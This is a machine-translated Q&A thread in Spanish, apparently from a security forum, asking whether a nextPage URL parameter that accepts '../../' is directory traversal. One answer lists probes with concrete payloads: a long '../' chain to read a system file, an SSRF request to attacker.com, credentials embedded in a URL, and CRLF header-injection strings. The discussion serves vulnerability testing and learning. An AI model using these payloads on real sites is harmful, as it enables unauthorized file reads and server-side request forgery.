¿Se considera este recorrido del directorio?

1

Por lo tanto, actualmente estoy probando un sitio que tiene una URL como esta

example.com/dir1/dir2?nextPage=/someOtherDir/someHTMLfile.html

Descubrí que puedo hacer para llegar a la página de inicio

example.com/dir1/dir2?nextPage=../../

o puedo leer archivos como el CSS para otra página

example.com/dir1/dir2?nextPage=../../dir3/dir4/css/main.css

NOTA : la política de la compañía establece que un investigador solo puede realizar la cantidad mínima de pruebas necesarias para demostrar que es una vulnerabilidad, por lo que no quiero intentar acceder al archivo de contraseña o cualquier otro Archivo sensible que aún no es público. También probé example.com/dir1/dir2?nextPage=google.com pero parece comprobar si la URL es local para que no funcione. ¿Lo que encontré se consideraría recorrido de directorio?

    
pregunta Alex 17.07.2017 - 04:04
fuente

2 respuestas

3

Parece un recorrido de directorio. Para probar si es realmente explotable, intentaría abrir algo más interesante como un archivo de script que no está disponible públicamente. De lo contrario, no puede estar seguro de que un atacante realmente pueda hacer algo interesante. En mi opinión, eso estaría en línea con las pruebas mínimas. Tal vez haya un filtro que solo permita abrir archivos .html y .css.

    
respondido por el 40F4 17.07.2017 - 08:56
fuente
0

Es el recorrido de la ruta, pero el recorrido de la ruta no es una vulnerabilidad.

Puede verificar los siguientes vectores de ataque cuando tenga un recorrido transversal:

Enumeración de directorios:

Si ../../dir3/dir4/css/main.css es verdadero,
../../ dir3 /../ < /b>dir3/dir4/css/main.css es verdadero y
../../ QWERTYUIOP /../ dir3 / dir4 / css / main .css es falso,
es una enumeración de directorio.

Lectura de archivo arbitrario:

Es como un archivo arbitrario leído, pero puedes verificar las rutas del sistema:

example.com/dir1/dir2?nextPage=../../../../../../../../sys/power/wakeup_count

El archivo devolverá un entero. No es / etc / passwd, wakeup_count no es información crítica.

Falsificación de solicitudes del lado del servidor:

Si desea verificar el ataque de las redes, necesita usar URI. Solo el nombre de dominio no funciona.

example.com/dir1/dir2?nextPage=http://attacker.com/

Si piensa que someHTMLfile.html es un recurso de red, puede probar sus vectores:

example.com/dir1/dir2?nextPage=username:[email protected]/
example.com/dir1/dir2?nextPage=%20HTTP/1.1%0A%0DTest:%20
example.com/dir1/dir2?nextPage=%20HTTP/1.1%E5%98%8A%E5%98%8DTest:%20

Inclusión de archivos locales:

No verifica la vulnerabilidad de LFI sin un ataque activo en el servidor :( Lo siento.

    
respondido por el Sha000 08.09.2017 - 19:51
fuente

Lea otras preguntas en las etiquetas